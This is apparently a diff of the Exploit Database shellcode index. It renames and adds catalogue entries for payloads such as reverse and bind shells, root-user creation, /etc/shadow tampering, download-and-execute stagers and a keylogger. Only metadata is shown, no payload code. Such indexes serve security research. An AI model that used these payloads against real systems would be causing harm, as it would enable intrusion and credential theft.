 40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
 40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
@@ -581,26 +581,26 @@ id,file,description,date,author,type,platform
 40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
 40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
 40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
-40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
+40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse TCP (127.1.1.1:10)  Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
 40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
 40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
 40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
 40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
-40175,shellcodes/windows_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
+40175,shellcodes/windows_x86/40175.c,"Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
 40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86
 40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86
-40245,shellcodes/windows_x86/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-40246,shellcodes/windows_x86/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-40259,shellcodes/windows_x86/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
-43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
-43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
+40245,shellcodes/windows_x86/40245.c,"Windows/x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+40246,shellcodes/windows_x86/40246.c,"Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+40259,shellcodes/windows_x86/40259.c,"Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
+43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
+43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
 43565,shellcodes/linux_x86-64/43565.asm,"Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64
 43566,shellcodes/linux_x86-64/43566.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
 43568,shellcodes/linux_x86-64/43568.asm,"Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
 43570,shellcodes/linux_x86-64/43570.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64
-43597,shellcodes/linux_x86-64/43597.c,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
+43597,shellcodes/linux_x86-64/43597.c,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64
 43598,shellcodes/linux_x86-64/43598.c,"Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
 43599,shellcodes/linux_x86-64/43599.c,"Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64
 43601,shellcodes/linux_x86-64/43601.asm,"Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64
@@ -613,11 +613,11 @@ id,file,description,date,author,type,platform
 43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86
 43610,shellcodes/osx_ppc/43610.c,"OSX/PPC - Remote findsock by recv() Key Shellcode",2009-01-01,"Dino Dai Zovi",shellcode,osx_ppc
 43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
-43612,shellcodes/osx_ppc/43612.asm,"OSX/PPC - Stager Sock Find MSG_PEEK Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
+43612,shellcodes/osx_ppc/43612.asm,"OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
 43613,shellcodes/osx_ppc/43613.asm,"OSX/PPC - Stager Sock Find Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
 43614,shellcodes/osx_ppc/43614.asm,"OSX/PPC - Stager Sock Reverse Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
 43615,shellcodes/osx_ppc/43615.c,"OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes)",2009-01-01,"H D Moore",shellcode,osx_ppc
-43616,shellcodes/osx_ppc/43616.asm,"OSX/PPC - execve(/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,osx_ppc
+43616,shellcodes/osx_ppc/43616.asm,"OSX/PPC - execve(/bin/sh) + Null-Free Shellcode",2009-01-01,ghandi,shellcode,osx_ppc
 43617,shellcodes/osx_ppc/43617.c,"OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes)",2009-01-01,haphet,shellcode,osx_ppc
 43618,shellcodes/osx/43618.c,"OSX/x86 - execve(/bin/sh) Shellcode (24 bytes)",2009-01-01,haphet,shellcode,osx
 43626,shellcodes/linux_x86/43626.c,"Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes)",2009-01-01,vlad902,shellcode,linux_x86
@@ -667,7 +667,7 @@ id,file,description,date,author,type,platform
 43669,shellcodes/linux_x86/43669.c,"Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes)",2009-01-01,bob,shellcode,linux_x86
 43670,shellcodes/linux_x86/43670.c,"Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes)",2009-01-01,bob,shellcode,linux_x86
 43671,shellcodes/linux_x86/43671.c,"Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes)",2009-01-01,bob,shellcode,linux_x86
-43672,shellcodes/generator/43672.c,"Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)",2009-01-01,"Russell Sanford",shellcode,generator
+43672,shellcodes/generator/43672.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)",2009-01-01,"Russell Sanford",shellcode,generator
 43673,shellcodes/linux_x86/43673.c,"Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)",2009-01-01,sacrine,shellcode,linux_x86
 43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86
 43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86
@@ -682,8 +682,8 @@ id,file,description,date,author,type,platform
 43688,shellcodes/linux_x86/43688.c,"Linux/x86 - exit(0) Shellcode (8 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 43689,shellcodes/linux_x86/43689.c,"Linux/x86 - sync Shellcode (6 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 43690,shellcodes/linux_x86/43690.c,"Linux/x86 - execve(/bin/sh_ -c_ ping localhost)  Shellcode (55 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
-43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
-43692,shellcodes/linux_x86/43692.c,"Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
+43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+43692,shellcodes/linux_x86/43692.c,"Linux/x86 - setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!) Shellcode (58 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
 43694,shellcodes/linux_x86/43694.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)",2018-01-14,"Hashim Jawad",shellcode,linux_x86
 43695,shellcodes/linux_x86/43695.c,"Linux/x86 - Force unmount /media/disk Shellcode (33 bytes)",2010-06-04,gunslinger_,shellcode,linux_x86
 43696,shellcodes/linux_x86/43696.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes)",2009-01-01,agix,shellcode,linux_x86
@@ -691,8 +691,7 @@ id,file,description,date,author,type,platform
 43698,shellcodes/linux_x86/43698.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
 43699,shellcodes/linux_x86/43699.c,"Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
 43700,shellcodes/linux_x86/43700.c,"Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
-43701,shellcodes/linux_x86/43701.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)",2009-01-01,"John Babio",shellcode,linux_x86
-43702,shellcodes/linux_x86/43702.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)",2009-01-01,Kernel_Panik,shellcode,linux_x86
+43702,shellcodes/linux_x86/43702.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)",2009-01-01,Kernel_Panik,shellcode,linux_x86
 43703,shellcodes/linux_x86/43703.c,"Linux/x86 - execve(/bin/dash) Shellcode (49 bytes)",2009-01-01,Chroniccommand,shellcode,linux_x86
 43704,shellcodes/linux_x86/43704.c,"Linux/x86 - execve(/bin/cat_ /etc/shadow_ NULL) Shellcode (42 bytes)",2009-01-01,antrhacks,shellcode,linux_x86
 43705,shellcodes/linux_x86/43705.c,"Linux/x86 - /etc/init.d/apparmor teardown Shellcode (53 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
@@ -708,42 +707,82 @@ id,file,description,date,author,type,platform
 43722,shellcodes/linux_x86/43722.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
 43725,shellcodes/linux_x86/43725.c,"Linux/x86 - Force Reboot Shellcode (36 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
 43724,shellcodes/linux_x86/43724.c,"Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
-43726,shellcodes/linux_x86/43726.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43727,shellcodes/linux_x86/43727.c,"Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43728,shellcodes/linux_x86/43728.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43729,shellcodes/linux_x86/43729.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43730,shellcodes/linux_x86/43730.c,"Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43731,shellcodes/linux_x86/43731.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-43732,shellcodes/linux_x86/43732.c,"Linux/x86 - Egghunter Shellcode (38 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
-40549,shellcodes/windows_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
-40560,shellcodes/windows_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
-40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+43726,shellcodes/linux_x86/43726.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43727,shellcodes/linux_x86/43727.c,"Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43728,shellcodes/linux_x86/43728.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43729,shellcodes/linux_x86/43729.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43730,shellcodes/linux_x86/43730.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43731,shellcodes/linux_x86/43731.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43732,shellcodes/linux_x86/43732.c,"Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43735,shellcodes/linux_x86/43735.c,"Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43736,shellcodes/linux_x86/43736.c,"Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43737,shellcodes/linux_x86/43737.c,"Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43738,shellcodes/linux_x86/43738.c,"Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43739,shellcodes/linux_x86/43739.c,"Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43740,shellcodes/linux_x86/43740.c,"Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43741,shellcodes/generator/43741.py,"Linux/x86 - Uzumaki Encryptor Shellcode (Generator)",2013-01-01,"Geyslan G. Bem",shellcode,generator
+43742,shellcodes/linux_x86/43742.c,"Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes)",2009-01-01,"Russell Willis",shellcode,linux_x86
+43743,shellcodes/linux_x86/43743.c,"Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)",2009-01-01,"Hamid Zamani",shellcode,linux_x86
+43744,shellcodes/linux_x86/43744.c,"Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)",2013-05-28,"Russell Willis",shellcode,linux_x86
+43745,shellcodes/linux_x86/43745.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86
+43746,shellcodes/linux_x86/43746.c,"Linux/x86 - Bind TCP Shell Shellcode (112 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86
+43747,shellcodes/linux_x86/43747.c,"Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
+43748,shellcodes/linux_x86/43748.c,"Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86
+43749,shellcodes/linux_x86/43749.asm,"Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
+43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
+43751,shellcodes/linux_x86/43751.asm,"Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)",2009-01-01,"Shihao Song",shellcode,linux_x86
+43752,shellcodes/linux_x86/43752.asm,"Linux/x86 - execve() Using  JMP-FSTENV Shellcode (67 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
+43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith Jayathissa",shellcode,linux_x86
+43754,shellcodes/linux_x86/43754.c,"Linux/x86 - shutdown -h now Shellcode (56 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86
+43755,shellcodes/linux_x86/43755.c,"Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)",2014-07-13,"Julien Ahrens",shellcode,linux_x86
+43756,shellcodes/linux_x86/43756.c,"Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)",2014-07-25,"Julien Ahrens",shellcode,linux_x86
+43757,shellcodes/linux_x86/43757.c,"Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)",2014-05-08,"Ali Razmjoo",shellcode,linux_x86
+43758,shellcodes/linux_x86/43758.txt,"Linux/x86 - execve() + ROT-7  Shellcode (Encoder/Decoder)  (74 bytes)",2009-01-01,"Stavros Metzidakis",shellcode,linux_x86
+43759,shellcodes/windows_x86/43759.asm,"Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
+43760,shellcodes/windows_x86/43760.asm,"Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
+43761,shellcodes/windows_x86/43761.asm,"Windows/x86 - Create Admin User (X) Shellcode (304 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
+43762,shellcodes/windows_x86/43762.c,"Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes)",2009-01-01,OpTix,shellcode,windows_x86
+43763,shellcodes/windows_x86/43763.txt,"Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes)",2009-01-01,Aodrulez,shellcode,windows_x86
+43764,shellcodes/windows_x86/43764.c,"Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes)",2009-01-01,cr4wl3r,shellcode,windows_x86
+43765,shellcodes/windows_x86/43765.c,"Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes)",2009-01-01,agix,shellcode,windows_x86
+43766,shellcodes/windows_x86/43766.asm,"Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes)",2009-01-01,Skylined,shellcode,windows_x86
+43767,shellcodes/windows_x86/43767.asm,"Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes)",2009-01-01,Skylined,shellcode,windows_x86
+43768,shellcodes/windows_x86/43768.asm,"Windows/x86 - Message Box + Null-Free Shellcode (140 bytes)",2009-01-01,Skylined,shellcode,windows_x86
+43769,shellcodes/windows_x86/43769.c,"Windows/x86 (XP SP3) (Turkish) - MessageBoxA Shellcode (109 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
+43770,shellcodes/windows_x86/43770.c,"Windows/x86 (XP SP3) (Turkish) - calc.exe Shellcode (53 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
+43771,shellcodes/windows_x86/43771.c,"Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
+43772,shellcodes/windows_x86/43772.c,"Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
+43773,shellcodes/windows_x86/43773.c,"Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes)",2010-07-10,"John Leitch",shellcode,windows_x86
+43774,shellcodes/windows_x86/43774.c,"Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)",2009-01-01,d3c0der,shellcode,windows_x86
+40549,shellcodes/windows_x86-64/40549.c,"Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
+40781,shellcodes/windows_x86-64/40781.c,"Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
-40821,shellcodes/windows_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
-40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
-40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
-40981,shellcodes/windows_x86-64/40981.c,"Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
-41072,shellcodes/windows_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
-41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
+40821,shellcodes/windows_x86-64/40821.c,"Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
+40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
+40981,shellcodes/windows_x86-64/40981.c,"Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+41072,shellcodes/windows_x86-64/41072.c,"Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
 41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
 41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
 41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux
 41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
 41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
